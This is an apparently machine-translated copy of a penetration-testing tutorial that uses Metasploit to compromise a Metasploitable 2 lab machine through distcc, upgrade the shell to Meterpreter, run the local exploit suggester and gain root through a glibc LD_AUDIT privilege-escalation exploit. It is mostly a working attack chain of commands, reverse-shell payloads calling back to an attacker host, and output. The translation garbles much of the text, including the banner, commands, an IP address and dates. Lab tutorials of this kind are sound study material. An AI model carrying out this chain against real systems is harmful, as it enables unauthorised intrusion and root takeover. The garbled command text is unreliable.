قالب وردپرس درنا توس
Home / Tips and Tricks / How do I get root with Metasploit's Local Exploit Suggester? «Null Byte :: WonderHowTo

How do I get root with Metasploit's Local Exploit Suggester? «Null Byte :: WonderHowTo



You have managed to get a shell to the target, but you have very low privileges. What now? The escalation of privileges is a wide field and can be one of the most rewarding but also the most frustrating phases of an attack. We could go the manual way, but as always, Metasploit makes it easy to perform local privilege escalation and become root with its Exploit Suggester module.

To go through the process, we use Kali Linux as the attack engine and Metasploitable 2 as the target. You can set up or use a similar or the same pentesting lab to follow the instructions below.

Step 1: Align the Session to the Goal

First, we have to issue a . Low-privileged session on the target. With Metasploit this is easily possible. Type msfconsole in the terminal to start it.

  ~ $ msfconsole

[-] *** rting the Metasploit Framework Console ... 
[-] * WARNING: No database support: No database YAML file
[-]

, ,,. ,
,  $$$$$ L .. ,, == aaccaacc% # s $ b. d8, d8p
d8P # $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ `BP d888888p
d888888P & # 39; 7 $$$$  "" "& # 39; ^^` `.7 $$$ | D *" & # 39; `` `? 88 & # 39;
d8bd8b.d8p d8888b? 88 # d888b8b _.os # $ | 8 * "` d8P? 8b 88P
88P & # 39; P & # 39 ;? P d8b_, dP 88P d8P & # 39; 88.oaS ### S * "` d8P d8888b $ whi? 88b 88b
d88 d8? 8 88b 88b 88b, 88b .osS $$$$ * "? 88, .d88b, d88 d8P? 88 88P & # 39; 8b
d88 & d88b8b & # 39; & # 39; 8888P & # 39; & # 39; 8b & # 39; & # 39; 88P & # 39; .aS $$$$ Q * & # 39; & # 39; & # 39; # 88 & 39; 88 88 88b d88 d88
.a # $$$$$$ "` 88b d8p 88b`? 8888P & # 39;
, s $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
.a $$$$$$ P` d88P &. 39; ass% # S $$$$$$$$$$$$$$$$$$$$$$$$$$$$?
.a $ ### $$$ P` _. ,, - aqsc # SS $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$?
, a $$ ### $$ P `_., - ass # S $$$$$$$$ #### SSSS & # 39;
.a $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ ; & # 39; ^^ / $$$$$$ & # 39;
_______________________________________________________________, & $$$$$$ & # 39; _____
ll && $$$$ & # 39;
, ;; lll &&&& & # 39;
... ;; III. & # 39;
...... ;;; llll ;;; ....
"...... ;;;; .....

= [ metasploit v5.0.20-dev                          ]
+ - - = [ 1886 exploits - 1065 auxiliary - 328 post       ]
+ - - = [ 546 payloads - 44 encoders - 10 nops            ]
+ - - = [ 2 evasion                                       ]

msf5> 

Metasploitable includes a vulnerable service called distccd, which is used to distribute program compilation across multiple systems to speed things up by leveraging combined processor performance. Unfortunately, an attacker can use this program version to execute arbitrary commands on the server.

The exploit can be searched with the command search :

  msf5> search distcc

Matching modules
================

# Name Disclosure Date Rank Check Description
- ---- ---------------- ---- ----- -----------
0 exploit / unix / misc / distcc_exec 2002-02-01 excellent Yes Running the DistCC daemon command 

To load the module, enter with followed by the module's full path:

  msf5 > use Exploit / unix / misc / distcc_exec 

The available settings are now displayed with the options . Command :

  msf5 exploit (unix / misc / distcc_exec)> options

Module Options (Exploit / Unix / Misc / distcc_exec):

Name Current setting Required Description
---- --------------- -------- -----------
RHOSTS yes The destination address range or the CIDR identifier
RPORT 3632 yes The destination port (TCP)

Take advantage of the goal:

ID name
- ----
0 Auto Destination 

It looks like we only need to set the remote host address because the remote port is already set with the default port number. Use the command set to specify the appropriate IP address of the target:

  msf5 exploit (unix / misc / distcc_exec)> set rhosts 10.10.0.50

rhosts => 10.10.0.50 

Now we can start the exploit. Use the command run which is just a shorter alias for the exploit:

  msf5 exploit (unix / misc / distcc_exec)> run

[*] The reverse TCP dual handler was started on 10.10.0.1:4444
[*] Accepted the first client connection ...
[*] Accepted the second client connection ...
[*] Command: echo sWI9yfQYbPxuIGrh;
[*] Write to socket A
[*] Write to Socket B
[*] Reading from sockets ...
[*] Read from socket B
[*] B: "sWI9yfQYbPxuIGrh  r  n"
[*] Matching ...
[*] A is entered ...
[*] Command Shell Session 1 opened at 2019-11-19 11:46:02 -0500 (10.10.0.1:4444 -> 10.10.0.50:58006)

uname -a
Linux metasploitable 2.6.24-16-server # 1 SMP Thu 10.04. 13:58:00 UTC 2008 i686 GNU / Linux 

We can see that a command shell has been opened and running uname -a confirms that we have compromised the target.

Step 2: Upgrade to Meterpreter

To use Metasploit's local exploit suggestor, we need to update our basic Unix command shell to a meterpreter session. While still in the basic command shell, press Ctrl-Z to start the session in the background. Press Y when prompted.

  Background Session 1? [y/N] y
msf5 exploit (unix / misc / distcc_exec)> 

We now return to Metasploit's main request and review all sessions running in the background with the command sessions :

  msf5-Exploit (unix / misc / distcc_exec)> sessions

Active sessions
===============

ID Name Type Information Connection
- ---- ---- ----------- ----------
1 Shell cmd / unix 10.10.0.1:4444 -> 10.10.0.50:58006 (10.10.0.50) 

The easiest way to update a regular shell to a meterpreter session is to use the -u flag followed by the session number to be updated:

  msf5 exploit (unix / misc / distcc_exec)> sessions -u 1

[*] Running & # 39; post / multi / manage / shell_to_meterpreter & # 39; for session (s): [1]

[*]   Update Session ID: 1
[*] Start exploit / multi / handler
[*] The reverse TCP handler was started on 10.10.0.1:4433
[*] Send level (985320 bytes) to 10.10.0.50
[*] The Meter Session 2 was opened on 2019-06-19 11:47:52 -0500 (10.10.0.1:4433 -> 10.10.0.50:32979)
[*] Commands Progress: 100.00% (773/773 bytes) 

The post module that is running is displayed, and a new session opens. We can check this again with the command sessions :

  msf5 exploit (unix / misc / distcc_exec)> sessions

Active sessions
===============

ID Name Type Information Connection
- ---- ---- ----------- ----------
1 shell cmd / unix 10.10.0.1:4444 -> 10.10.0.50:58006 (10.10.0.50)
2 meterpreter x86 / linux uid = 1, gid = 1, euid = 1, egid = 1 @ metasploitable.localdomain 10.10.0.1:4433 -> 10.10.0.50:32979 (10.10.0.50) 

And we can interact with ours New meterpreter session with the flag -i for the session you want:

  msf5 exploit (unix / misc / distcc_exec)> sessions -i 2

[*] Start of interaction with 2 ...

meterpreter> 

Step 3: Run Exploit Suggester

Metasploit post modules will run in a background session, not directly in the session itself, in background session 2 (our Meterpreter shell), and return to the main prompt , Then we can load the local exploit suggestor with the following command:

  msf5 exploit (unix / misc / distcc_exec)> use post / multi / recon / local_exploit_suggester 

If we look at the options, all we have to do is look Specify the session for which to do this:

  msf5 post (multi / recon / local_exploit_suggester)> options

Module options (post / multi / recon / local_exploit_suggester):

Name Current setting Required Description
---- --------------- -------- -----------
SESSION yes The session on which to run this module
SHOWDESCRIPTION false yes Displays a detailed description of the available exploits. 

Just put the session on number 2, which is our meterpreter shell:

  msf5 post (multi / recon / local_exploit_suggester)> set session 2

session => 2 

And at the beginning, enter run :

  msf5 post (multi / recon / local_exploit_suggester)> run

[*] 10.10.0.50 - Collect local exploits for x86 / Linux ...
[*] 10.10.0.50 - 26 exploit checks are attempted ...
[+] 10.10.0.50 - Exploit / linux / local / glibc_ld_audit_dso_load_priv_esc: The target seems vulnerable.
[+] 10.10.0.50 - Exploit / linux / local / glibc_origin_expansion_priv_esc: The target seems vulnerable.
[+] 10.10.0.50 - Exploit / linux / local / netfilter_priv_esc_ipv4: The target seems vulnerable.
[*] Execution After the Module Completed 

We can see that the module checks a bunch of local exploits and returns a few that seem feasible. Brilliant.

Step 4: Get Root

Lastly, we need to use one of these exploits to get root on the system. We will try the first one suggested to us. This exploit exploits a vulnerability in the glibc dynamic linker where the LD_AUDIT environment variable allows loading a setuid object that will eventually execute with root privileges.

  msf5 post (multi / recon / local_exploit_suggester)> use exploit / linux / local / glibc_ld_audit_dso_load_priv_esc 

If we look at the options, all we have to do is set the session again – the default executable path works for now:

  msf5 -Exploit (linux / local / glibc_ld_audit_dso_load_priv_esc)> options

Module options (exploit / linux / local / glibc_ld_audit_dso_load_priv_esc):

Name Current setting Required Description
---- --------------- -------- -----------
SESSION yes The session on which to run this module.
SUID_EXECUTABLE / bin / ping yes Path to a SUID program file

Take advantage of the goal:

ID name
- ----
0 Automatic 

Set the session as before:

  msf5 exploit (linux / local / glibc_ld_audit_dso_load_priv_esc)> Set Session 2

session => 2 

We can also set the payload to give us another meterpreter session after the exploit has ended:

  msf5 exploit (linux / local / glibc_ld_audit_dso_load_priv_esc)> set payload linux / x86 / meterpreter / reverse_tcp

payload => linux / x86 / meterpreter / reverse_tcp 

And set the appropriate listener host (the IP address of our local machine) and port:

  msf5 exploit (linux / local / glibc_ld_audit_dso_load_priv_esc)> set lhost 10.10 .0.1

lhost => 10.10.0.1

msf5 exploit (linux / local / glibc_ld_audit_dso_load_priv_esc)> set lport 4321

lport => 4321 

Finally, enter run to start the exploit:

  msf5 exploit (linux / local / glibc_ld_audit_dso_load_priv_esc)> run

[*] The reverse TCP handler was started on 10/10/0/:4321
[+] The goal seems vulnerable
[*] Target used: Linux x86
[*] Write from & # 39; /tmp/.BlrZu4n' (1271 bytes) ...
[*] Write from & # 39; /tmp/.18qZUt' (281 bytes) ...
[*] Write from & # 39; /tmp/.DoiFwlxPt' (207 bytes) ...
[*] Exploit is started ...
[*] Send level (985320 bytes) to 10.10.0.50
[*] The Meterpreter Session 3 was opened on 2019-11-19 11:57:19 -0500 (10.10.0.1:4321 -> 10.10.0.50:56950)

meterpreter> 

We now have a new meterpreter session on target and may fall into a shell to verify that we have root access:

  meterpreter> shell
Process 4886 created.
Channel 1 created.
I would
uid = 0 (root) gid = 0 (root) groups = 1 (daemon)
uname -a
Linux metasploitable 2.6.24-16-server # 1 SMP Thu 10.04. 13:58:00 UTC 2008 i686 GNU / Linux 

Summary

In this tutorial, we learned how to use Metasploit to get a shell for that Update to a Meterpreter session and use that shell the local exploit suggestor module to eventually become root on the system. Metasploit not only facilitates first-time use, but also the post-usage phase. In the next article we will examine some useful post modules to quickly get information about the target.

Cover image of Pixabay / Pexels; Screenshots of drd_ / zero byte

Source link